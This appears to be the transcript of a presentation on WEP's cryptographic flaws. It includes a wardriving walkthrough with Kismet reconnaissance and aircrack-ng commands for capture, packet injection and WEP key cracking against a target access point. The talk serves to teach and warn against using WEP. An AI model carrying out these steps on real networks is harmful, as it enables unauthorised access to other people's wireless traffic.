Transcript Slideshow: The Trouble with WEP

The Trouble with WEP
Or, cracking WiFi networks
for fun & profit (not really)
Overview




Background and a little history
How WEP works
WEP’s major weaknesses
A short course in wardriving


Using kismet to scout out the wireless landscape
Zeroing in with the aircrack-ng suite



airodump, to capture traffic
aireplay, to replay weakly encrypted packets
aircrack, to find the key using statistical methods
Background & history…






Wireless Equivalent Privacy
Adopted in 1999 as part of 802.11 standard
Later swallowed whole by 802.11b standard
Initially, used only 40-bit encryption keys, due
to technology export restrictions
Later, expanded to 104-bit keys when export
restrictions were eased
Used 6 times as often as WPA/WPA2 despite
known fatal weakness* (85% / 14% / 1%)
*Based on a 2006 survey in Seattle area
How WEP works
1.
2.
3.
4.
5.
6.
Plain text gets CRC-32 checksum appended
24-bit initialization vector pre-pended to key
as a seed for RC4 key scheduling algorithm
RC4’s pseudo-random generation algorithm
outputs keystream
Keystream XORed with plain text
IV in plain text pre-pended to message
On receipt, keystream regenerated and
XORed with cipher text to produce plain text
WEP’s major weaknesses

IV space too small (224)






On a busy network, IVs must repeat in <= 5 hours
50% probability that IV repeats in 5,000 packets
RC4 algorithm produces “weak” IVs that can
be correctly guessed 5% or 13% of the time
No key management; typically just one key
IP traffic contains much known plaintext data
Open to injected traffic that is rebroadcast
Wardriving: Kismet






Network detector, sniffer, IDS
Works on 802.11b, 802.11a, 802.11g
networks
Uses passive monitoring, so hard to detect
Logs sniffed packets in formats compatible
with Wireshark/Tcpdump, Airsnort
Channel surfs automatically
Optionally, supports GPS for network location
Kismet: Install & configure




Binary packages available for most systems
Requires WiFi adaptor that supports monitor
mode as “capture source”
Logs traffic in popular formats*
Specify source in /etc/kismet/kismet.conf, as
driver,device,source_name
source=ipw2200,eth1,Stella
*Wireshark, Airsnort, etc.
Stella, the WiFi attack animal!
Wardriving: Recon phase

Use Kismet to survey WiFi landscape and to
choose a target network

Record necessary data for Aircrack attack:

Channel number?

SSID?

Access point MAC address?
Wardriving: Kismet
Wardriving: Attack phase

Aircrack-ng: Software for network detection,
sniffing, WEP cracking, and analysis

Works on 802.11b, 802.11a, 802.11g

Uses passive monitoring & packet injection

Main tools

aircrack-ng: Cracking

airdecap: Packet decryption

airmon: Monitor mode switching

aireplay: Packet injection (Linux only)

airodump: Exports traffic to .cap files
Wardriving: Aircrack procedure
1. Bring up adapter on target’s channel in
monitor mode:
# ifconfig wlan0 up
# iwconfig wlan0 mode Monitor channel 9
2. Capture packets to file on channel, IVs only
# airodump wlan0 ./berlin_dump 9 1
Wardriving: Airodump
Wardriving: Aircrack procedure
3. Find weakly-encrypted packets to replay in
interactive mode
# aireplay -2 -b 00:14:6C:40:BA:A6 \
-x 512 wlan0
4. Finally, crack WEP key with captured IVs
# aircrack -n 64 berlin-dump.ivs
Wardriving: Aireplay
Wardriving: Aircrack
Summary





WEP has numerous serious flaws
WEP's flaws are thoroughly documented
WEP is readily exploitable in a short time, by
unskilled attackers, using readily available
tools
Strong protection is readily available
Bottom line:
Don't use WEP, period!
Questions?